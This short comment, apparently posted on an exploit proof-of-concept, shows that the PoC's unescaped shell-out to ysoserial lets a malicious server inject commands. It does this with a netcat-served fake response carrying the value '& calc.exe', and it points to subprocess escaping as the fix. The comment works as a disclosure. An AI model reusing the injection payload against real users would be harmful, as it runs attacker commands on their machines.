Yo dawg

[Plazmaz]

I made a PoC for your PoC so I can pop shells while you pop shells:

echo '''HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: localhost
Cookie: ASP.NET_SessionId=test-sess-id Time

<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>

''' |sudo nc -l 80

Assuming you're running your PoC as python3 exploit.py -s http://localhost/ -u admin -p admin and blindly running that, the output command becomes: ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug –islegacy which pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params: https://docs.python.org/3/library/subprocess.html#subprocess.run